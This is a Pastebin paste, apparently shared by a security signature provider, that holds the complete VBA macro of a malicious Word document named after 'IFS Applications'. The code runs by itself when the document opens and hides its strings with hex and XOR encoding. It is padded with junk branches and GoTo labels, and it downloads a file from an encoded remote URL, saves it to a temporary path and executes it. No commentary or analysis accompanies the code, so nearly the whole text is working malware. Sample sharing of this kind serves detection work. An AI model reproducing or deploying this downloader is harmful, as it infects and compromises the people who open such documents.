API tools faq
paste
Advertisement
Sanesecurity

doc macro malware: IFS Applications

Sanesecurity
Dec 15th, 2014
519
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.10 KB | None | 0 0
raw download clone embed print report
  1. Attribute VB_Name = "ThisDocument"
  2. Attribute VB_Base = "1Normal.ThisDocument"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = True
  8. Attribute VB_Customizable = True
  9. Public Function Hextostring(ByVal LIfBaRNaq As String) As String
  10. Dim bOYvqTVCQck As String
  11. Dim FNOMR As String
  12. Dim wDhutJNQ As Long
  13. For wDhutJNQ = 1 To Len(LIfBaRNaq) Step 2
  14. If 128918 = 128918 + 1 Then End
  15. If 3786 < 26 Then
  16. If 751819 = 751819 + 1 Then End
  17. If 3264 < 68 Then
  18. MsgBox ("uQQmbkpk91")
  19. End If
  20. If Len("gCUNhpmZ4478") = Len("AfkPTCKQ") Then
  21. MsgBox ("Error !!!")
  22. End If
  23. MsgBox ("HplLmocL88")
  24.  
  25. End If
  26. If Len("gnJhlPff4992") = Len("izYUCJCG") Then
  27. If 453232 = 453232 + 1 Then End
  28. If 2346 < 12 Then
  29. MsgBox ("tZGiCmps23")
  30. End If
  31. If Len("prksphdB3552") = Len("eRyRFxWn") Then
  32. MsgBox ("Error !!!")
  33. End If
  34. MsgBox ("Error !!!")
  35.  
  36. End If
  37. If 513385 = 513385 + 1 Then End
  38. If 1788 < 34 Then
  39. MsgBox ("MdLJUEle65")
  40. End If
  41. If Len("zvFxcxRf2893") = Len("gGbyDpzx") Then
  42. MsgBox ("Error !!!")
  43. End If
  44. bOYvqTVCQck = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(LIfBaRNaq, wDhutJNQ, 2)))
  45.  
  46.  
  47. If 679582 = 679582 + 1 Then End
  48. If 4764 < 49 Then
  49. If 988195 = 988195 + 1 Then End
  50. If 5892 < 13 Then
  51. MsgBox ("PLjzMDno76")
  52. End If
  53. If Len("opFcKgjZ3694") = Len("zQEGxwNt") Then
  54. MsgBox ("Error !!!")
  55. End If
  56. MsgBox ("CLZiRzih72")
  57.  
  58. End If
  59. If Len("ttcDmMln2566") = Len("kwoxPUHO") Then
  60. If 768811 = 768811 + 1 Then End
  61. If 3344 < 68 Then
  62. MsgBox ("LlhuNOmN91")
  63. End If
  64. If Len("aTqSHATq1946") = Len("AjrSPany") Then
  65. MsgBox ("Error !!!")
  66. End If
  67. MsgBox ("Error !!!")
  68.  
  69. End If
  70. If 312727 = 312727 + 1 Then End
  71. If 7138 < 44 Then
  72. MsgBox ("fwJBAgAh17")
  73. End If
  74. If Len("vkytXtMV8243") = Len("kLWxnsEn") Then
  75. MsgBox ("Error !!!")
  76. End If
  77. FNOMR = FNOMR & bOYvqTVCQck
  78.  
  79.  
  80. Next wDhutJNQ
  81. If 729678 = 729678 + 1 Then End
  82. If 3216 < 86 Then
  83. If 794514 = 794514 + 1 Then End
  84. If 3692 < 52 Then
  85. MsgBox ("rtzipwlx84")
  86. End If
  87. If Len("sjCDNfRU3716") = Len("vUIxhzzH") Then
  88. MsgBox ("Error !!!")
  89. End If
  90. MsgBox ("bocnPvMm58")
  91.  
  92. End If
  93. If Len("CbWCINQG1818") = Len("JaPgdumj") Then
  94. If 749461 = 749461 + 1 Then End
  95. If 6217 < 59 Then
  96. MsgBox ("clnhRiWt51")
  97. End If
  98. If Len("ZWzmHeVK6323") = Len("wxJSwpUl") Then
  99. MsgBox ("Error !!!")
  100. End If
  101. MsgBox ("Error !!!")
  102.  
  103. End If
  104. If 175442 = 175442 + 1 Then End
  105. If 6491 < 99 Then
  106. MsgBox ("cLrzZuDD22")
  107. End If
  108. If Len("TtBUlBVV7515") = Len("JwOkIDwu") Then
  109. MsgBox ("Error !!!")
  110. End If
  111. Hextostring = FNOMR
  112.  
  113.  
  114. End Function
  115.  
  116.  
  117. Sub Auto_Open()
  118. GoTo hpolxosipwleovqydqiijfmpmhadwhkijvlbokhmrnhlwrcbihvyiwnplgjfltwjtypwmbprbpunfrtvrl:
  119. hpolxosipwleovqydqiijfmpmhadwhkijvlbokhmrnhlwrcbihvyiwnplgjfltwjtypwmbprbpunfrtvrl:
  120. GoTo bfvcjnnjkjkvxctrntfoimlrjeyrtcbdbkdaxpratpwmmiosffuwjoxzowxecewxwdoypivotfbjbuxmul:
  121. bfvcjnnjkjkvxctrntfoimlrjeyrtcbdbkdaxpratpwmmiosffuwjoxzowxecewxwdoypivotfbjbuxmul:
  122. GoTo rkckdqbljfjtdbrryuwatebpsacldejdsschjsuavrcbpilzgevpmjxvcmfuzhozfprtuwyfedvshsetyf:
  123. rkckdqbljfjtdbrryuwatebpsacldejdsschjsuavrcbpilzgevpmjxvcmfuzhozfprtuwyfedvshsetyf:
  124. IOWZJGNTSGK
  125. End Sub
  126. Sub AutoOpen()
  127. GoTo zgjksfckvjbfupbfpqerjkfbyvhphicghmdzwyshljawbwgybalblihqmatttqiaxprnmitiumgzjglrmt:
  128. zgjksfckvjbfupbfpqerjkfbyvhphicghmdzwyshljawbwgybalblihqmatttqiaxprnmitiumgzjglrmt:
  129. GoTo ntkwgbazodnxlmngkssfvjdwvczwjxotblvzzropmwqzxlujflzjpazteectmrbvtqnnnqobmcyydrssnb:
  130. ntkwgbazodnxlmngkssfvjdwvczwjxotblvzzropmwqzxlujflzjpazteectmrbvtqnnnqobmcyydrssnb:
  131. GoTo ocgfmhrsimdpiyclijxwpjopjtlwjtopoyithnuojbvcaauwaavscrmxsabgqvemffbcddzhhdsvmnjfcp:
  132. ocgfmhrsimdpiyclijxwpjopjtlwjtopoyithnuojbvcaauwaavscrmxsabgqvemffbcddzhhdsvmnjfcp:
  133. Auto_Open
  134. End Sub
  135. Sub Workbook_Open()
  136. GoTo fqugoppeeftaopjzsjmupsrtovfxedfgpecorppweusztfkzphwpfhofwhixfaghbmfkdwnsycrsvjrtly:
  137. fqugoppeeftaopjzsjmupsrtovfxedfgpecorppweusztfkzphwpfhofwhixfaghbmfkdwnsycrsvjrtly:
  138. GoTo heqkginwiaibyfsvwvqtxuitugennjoangyodyfcqziwybtnwvwtibwqomzimszrrprdgguukjywhbuygx:
  139. heqkginwiaibyfsvwvqtxuitugennjoangyodyfcqziwybtnwvwtibwqomzimszrrprdgguukjywhbuygx:
  140. GoTo psjngffkwvmdllnhrcbfqiugmqunvyccxewbrxqhmlfswjoulnrvcmkxsetiqqriaihnzvtulingjhehnf:
  141. psjngffkwvmdllnhrcbfqiugmqunvyccxewbrxqhmlfswjoulnrvcmkxsetiqqriaihnzvtulingjhehnf:
  142. Auto_Open
  143. End Sub
  144. Function ZUWSBYDOTWV(ByVal FYAMZFQXNVI As String, ByVal CVUDEDVJFST As String) As Boolean
  145. Dim VPBCRFOQENN As Object, LSFYHUDVCYR As Long, QSBXXUZTKRD As Long, MDLLXOKIXRV() As Byte
  146.  
  147. GoTo hjwiwiyeojxvawsanclcahyfrfgwjdikfsfnjazxovvouiysjoieyyyjvczcudqpbumdziyyzydjhmvmdd:
  148. hjwiwiyeojxvawsanclcahyfrfgwjdikfsfnjazxovvouiysjoieyyyjvczcudqpbumdziyyzydjhmvmdd:
  149. GoTo xwqdjsttofxtkraaybygbodqkprjcpmjlvvdoqvxaokuluhzjnnpkgyqmwfmtvooihxsiqkaoyssrerysn:
  150. xwqdjsttofxtkraaybygbodqkprjcpmjlvvdoqvxaokuluhzjnnpkgyqmwfmtvooihxsiqkaoyssrerysn:
  151. GoTo brfgzmzrcabwgbcfbtnfmhjqhazwlbtduyyfkhjhmcvjlqrnnuntxcjijgjcqvhnjmfvpgmywngwcdiybg:
  152. brfgzmzrcabwgbcfbtnfmhjqhazwlbtduyyfkhjhmcvjlqrnnuntxcjijgjcqvhnjmfvpgmywngwcdiybg:
  153. Set VPBCRFOQENN = CreateObject(XORI(Hextostring("3F34193F254049193F253A331522"), Hextostring("7267417269")))
  154. GoTo fpvygztoabfyscyqmjxaakqwiwqpjfzgwplzmhryvptavvsitizcoqgammdhoraqpviudbameizhxxkfiw:
  155. fpvygztoabfyscyqmjxaakqwiwqpjfzgwplzmhryvptavvsitizcoqgammdhoraqpviudbameizhxxkfiw:
  156. GoTo fjuvxpaemzuawljcczrjcqncfqtadadckbfxynawdigwsmxxfdtoiyzyriibnsacdbvkbubskrjrvkujkg:
  157. fjuvxpaemzuawljcczrjcqncfqtadadckbfxynawdigwsmxxfdtoiyzyriibnsacdbvkbubskrjrvkujkg:
  158. GoTo atdgxcypqufobazqwfbzsdpphuexwbgmzrvveuqfuissqnqrjbvmoathximeitkzlsazxqlwrbwkegkczc:
  159. atdgxcypqufobazqwfbzsdpphuexwbgmzrvveuqfuissqnqrjbvmoathximeitkzlsazxqlwrbwkegkczc:
  160. VPBCRFOQENN.Open XORI(Hextostring("00353B"), Hextostring("47706F634E")), FYAMZFQXNVI, False
  161. GoTo epeseeevnrzyaadmzsevtcsqluqvolrmjnixrzskpndwmoroasnxrummjcspjhcnelodnfpcezpisjevfv:
  162. epeseeevnrzyaadmzsevtcsqluqvolrmjnixrzskpndwmoroasnxrummjcspjhcnelodnfpcezpisjevfv:
  163. GoTo maokmvxjtqtpftqzvdrnngwsapudlcejlbqkuatexahbsfmqoicfoaivfabrltukeprqqvrfpvrejlgeqv:
  164. maokmvxjtqtpftqzvdrnngwsapudlcejlbqkuatexahbsfmqoicfoaivfabrltukeprqqvrfpvrejlgeqv:
  165. GoTo sjxdhcerkhefckeipoiiuyqtxyvinbyqezfovvlmrerfrqsyaywnotmvfernkainkhxraujtcwwztuqtrk:
  166. sjxdhcerkhefckeipoiiuyqtxyvinbyqezfovvlmrerfrqsyaywnotmvfernkainkhxraujtcwwztuqtrk:
  167. VPBCRFOQENN.Send XORI(Hextostring("2B0F25162232"), Hextostring("4C596D54"))
  168.  
  169.  
  170. GoTo gvmsrorblqfnrjolulwwxmxgvzmrtfbbfaljljudjhbbxnovjreufhyrdxpzrsvoxlooybzlkvwnadubpr:
  171. gvmsrorblqfnrjolulwwxmxgvzmrtfbbfaljljudjhbbxnovjreufhyrdxpzrsvoxlooybzlkvwnadubpr:
  172. GoTo vkgymmqtvhsqigckerbehvgndmtviptwxefqeovgkmdywdtsxwgeztwteajsmnvgovickubtbjojchvavr:
  173. vkgymmqtvhsqigckerbehvgndmtviptwxefqeovgkmdywdtsxwgeztwteajsmnvgovickubtbjojchvavr:
  174. GoTo eefacwluvdsabkxksygzskpgnyxphqvqmjvybamguztrddgzxprzrdeiyiuhbpgfwrexfqimxjosfotycl:
  175. eefacwluvdsabkxksygzskpgnyxphqvqmjvybamguztrddgzxprzrdeiyiuhbpgfwrexfqimxjosfotycl:
  176. MDLLXOKIXRV = VPBCRFOQENN.responseBody
  177.  
  178. GoTo oyvsqgqcyuwgtctubxrljpltcezjxtssqvblihttgpkbfekrxowacmwewceoaqxhdlotlqoquuaksqlcth:
  179. oyvsqgqcyuwgtctubxrljpltcezjxtssqvblihttgpkbfekrxowacmwewceoaqxhdlotlqoquuaksqlcth:
  180. GoTo dzhmmxhnfrasicvjjpseprigmeolanldvlihpwgoksljzgwoycrcitvhcaybislwhylvedsxyelioervvj:
  181. dzhmmxhnfrasicvjjpseprigmeolanldvlihpwgoksljzgwoycrcitvhcaybislwhylvedsxyelioervvj:
  182. GoTo isegyhulplxjpkfaqzstfxaboybyprklnkwzxoixqdexvibqjqqfvntdpjwopldzhmffbvvdvydebthefj:
  183. isegyhulplxjpkfaqzstfxaboybyprklnkwzxoixqdexvibqjqqfvntdpjwopldzhmffbvvdvydebthefj:
  184. QSBXXUZTKRD = FreeFile
  185. Open CVUDEDVJFST For Binary As #QSBXXUZTKRD
  186. Put #QSBXXUZTKRD, , MDLLXOKIXRV
  187. Close #QSBXXUZTKRD
  188. GoTo vdpicaomrghrizweyaaozmrwyiyrubxpytxwqedttfneypyxmwzolrkvrghzhcpvdovereglnjrdohqryu:
  189. vdpicaomrghrizweyaaozmrwyiyrubxpytxwqedttfneypyxmwzolrkvrghzhcpvdovereglnjrdohqryu:
  190. GoTo ngtplnbnislqtghybuwictiwrbvoddltxhtemlrbrltdyrcmoszexgadznluscjfpehkuhcvoouwavrtwv:
  191. ngtplnbnislqtghybuwictiwrbvoddltxhtemlrbrltdyrcmoszexgadznluscjfpehkuhcvoouwavrtwv:
  192. GoTo gwjszpofcnutwsbxmljtbuzrblemslyuiwjsilpkqhgvdmwohdyzopbtepgmqesyglpmmnbkpqghntgsfd:
  193. gwjszpofcnutwsbxmljtbuzrblemslyuiwjsilpkqhgvdmwohdyzopbtepgmqesyglpmmnbkpqghntgsfd:
  194.  
  195. GoTo byxsxnpghvnbvkrgcuhsgztkersubfntrrmtrcjdbemqbhuvetdyllrakpcaukdktlpyupnzytvynwldzz:
  196. byxsxnpghvnbvkrgcuhsgztkersubfntrrmtrcjdbemqbhuvetdyllrakpcaukdktlpyupnzytvynwldzz:
  197. GoTo cckqxskeypruwnmoemiyeejgtzmqhaaonszuqrucwwvahggyylevwcjiupfyjzqhzrvsrrqfpbsqtkaohq:
  198. cckqxskeypruwnmoemiyeejgtzmqhaaonszuqrucwwvahggyylevwcjiupfyjzqhzrvsrrqfpbsqtkaohq:
  199. GoTo rwxumqulzygtqkrwzfbqwfewutedetjeriydgckahepjhxcpztzzrnpepyfrngvfbxztxgufoefihmlxut:
  200. rwxumqulzygtqkrwzfbqwfewutedetjeriydgckahepjhxcpztzzrnpepyfrngvfbxztxgufoefihmlxut:
  201. Set hBBkbmop6VHJL = CreateObject(XORI(Hextostring("020A271C3D4C0300210E2B1330162B1F3F"), Hextostring("51624270")))
  202. GoTo zlbrmdtmprviueydvnhzltntlvfofmkntrjatbzfuxavnqxeasqawcqlnddunpozvflosmyvmvfrlwvkcw:
  203. zlbrmdtmprviueydvnhzltntlvfofmkntrjatbzfuxavnqxeasqawcqlnddunpozvflosmyvmvfrlwvkcw:
  204. GoTo cymkgaghrqzskhomptqembbmdowhzswsilmqxztokhksqucilnmcqlplntosnjpwpiizppkjdeaxupsqbc:
  205. cymkgaghrqzskhomptqembbmdowhzswsilmqxztokhksqucilnmcqlplntosnjpwpiizppkjdeaxupsqbc:
  206. GoTo sbawlclojhxparpakhmfucvtwinbxhjqqozqdofgmqiejtkkykqfzphrenmsqwmjekdxoeetrjwuemxnbh:
  207. sbawlclojhxparpakhmfucvtwinbxhjqqozqdofgmqiejtkkykqfzphrenmsqwmjekdxoeetrjwuemxnbh:
  208. hBBkbmop6VHJL.Open Environ(XORI(Hextostring("3C3F3A03"), Hextostring("687A7753"))) & XORI(Hextostring("1217092B0F0718371F1F133560362807"), Hextostring("4E535062"))
  209. GoTo zhbgddcmjsnilsugiepwecwcxltbxbjufbtgufsdjvftrhkrentmbfezatdpzztqsssichtcptvblraaxs:
  210. zhbgddcmjsnilsugiepwecwcxltbxbjufbtgufsdjvftrhkrentmbfezatdpzztqsssichtcptvblraaxs:
  211. GoTo iipgxjxthbjxifqrzxbojqmgpfqahonaeikufzxmtdozgioggaekervfdgvbuzkoumgelbasjdvpcmzutc:
  212. iipgxjxthbjxifqrzxbojqmgpfqahonaeikufzxmtdozgioggaekervfdgvbuzkoumgelbasjdvpcmzutc:
  213. GoTo zygtufihxcugogvxuetvxslpzbpcunbycgmjdickpmuxxndqhwvswlbiulydkhltbnyncpizuqgsjmcidn:
  214. zygtufihxcugogvxuetvxslpzbpcunbycgmjdickpmuxxndqhwvswlbiulydkhltbnyncpizuqgsjmcidn:
  215.  
  216. End Function
  217. Sub IOWZJGNTSGK()
  218. gGHBkj = XORI(Hextostring("3919123F427E4208200C301505261F7F0E0922573B1E492D113F4303371D"), Hextostring("516D664F78"))
  219.  
  220. GoTo vswgmmnoquqmdzdukyxjdchijuhbcdgxsbrnikwqdcfhiwhzbjaoqluoidzajkwvumggfhftcrnozygzlx:
  221. vswgmmnoquqmdzdukyxjdchijuhbcdgxsbrnikwqdcfhiwhzbjaoqluoidzajkwvumggfhftcrnozygzlx:
  222. GoTo eqowyelsbrffhhlqqucltfylnpeftufafvjrzyvtgvjpzvpeyxbayzjytlyclyghuqmwumbcduprmiblyx:
  223. eqowyelsbrffhhlqqucltfylnpeftufafvjrzyvtgvjpzvpeyxbayzjytlyclyghuqmwumbcduprmiblyx:
  224. GoTo ruzhzqmkplaybaejhgnsgttcpypofokfkpmcawosbktnfsxibprcykuytpgkldhvrbktjpihhfuxhbdqoh:
  225. ruzhzqmkplaybaejhgnsgttcpypofokfkpmcawosbktnfsxibprcykuytpgkldhvrbktjpihhfuxhbdqoh:
  226. ZUWSBYDOTWV gGHBkj, Environ(XORI(Hextostring("3E200501"), Hextostring("6A654851714A64"))) & XORI(Hextostring("11371B0A00123918220E001668143516"), Hextostring("4D734243414671"))
  227. End Sub
  228.  
  229. Public Function XORI(ByVal pThgwA As String, ByVal uTjbLtvPsxK As String) As String
  230. Dim qDrdEbaBjAmrQrC As Long
  231. If 197974 = 197974 + 1 Then End
  232. If 5669 < 12 Then
  233.  
  234. Dim rrsqtvVn As Integer
  235. rrsqtvVn = 1
  236. Do While rrsqtvVn < 83
  237. DoEvents: rrsqtvVn = rrsqtvVn + 1
  238. Loop
  239.  
  240. MsgBox ("vBNHchZL92")
  241. End If
  242. If Len("GoACvBKz6529") = Len("jDtqUckI") Then
  243.  
  244. Dim ZsaeMBSl As Integer
  245. ZsaeMBSl = 6
  246. Do While ZsaeMBSl < 96
  247. DoEvents: ZsaeMBSl = ZsaeMBSl + 1
  248. Loop
  249.  
  250. MsgBox ("Error !!!")
  251. End If
  252.  
  253. Dim llWAooaJ As Integer
  254. llWAooaJ = 4
  255. Do While llWAooaJ < 77
  256. DoEvents: llWAooaJ = llWAooaJ + 1
  257. Loop
  258.  
  259. For qDrdEbaBjAmrQrC = 1 To Len(pThgwA)
  260.  
  261. If 953497 = 953497 + 1 Then End
  262. If 6383 < 67 Then
  263.  
  264. Dim tMzCjwqZ As Integer
  265. tMzCjwqZ = 2
  266. Do While tMzCjwqZ < 53
  267. DoEvents: tMzCjwqZ = tMzCjwqZ + 1
  268. Loop
  269.  
  270. MsgBox ("IlZTqywD49")
  271. End If
  272. If Len("CLQsIKEv7233") = Len("JspJACJS") Then
  273.  
  274. Dim HUocoJtv As Integer
  275. HUocoJtv = 8
  276. Do While HUocoJtv < 68
  277. DoEvents: HUocoJtv = HUocoJtv + 1
  278. Loop
  279.  
  280. MsgBox ("Error !!!")
  281. End If
  282.  
  283. Dim qqtGMmtg As Integer
  284. qqtGMmtg = 3
  285. Do While qqtGMmtg < 94
  286. DoEvents: qqtGMmtg = qqtGMmtg + 1
  287. Loop
  288.  
  289. XORI = XORI & Chr(Asc(Mid(uTjbLtvPsxK, IIf(qDrdEbaBjAmrQrC Mod Len(uTjbLtvPsxK) <> 0, qDrdEbaBjAmrQrC Mod Len(uTjbLtvPsxK), Len(uTjbLtvPsxK)), 1)) Xor Asc(Mid(pThgwA, qDrdEbaBjAmrQrC, 1)))
  290.  
  291. Next qDrdEbaBjAmrQrC
  292. End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!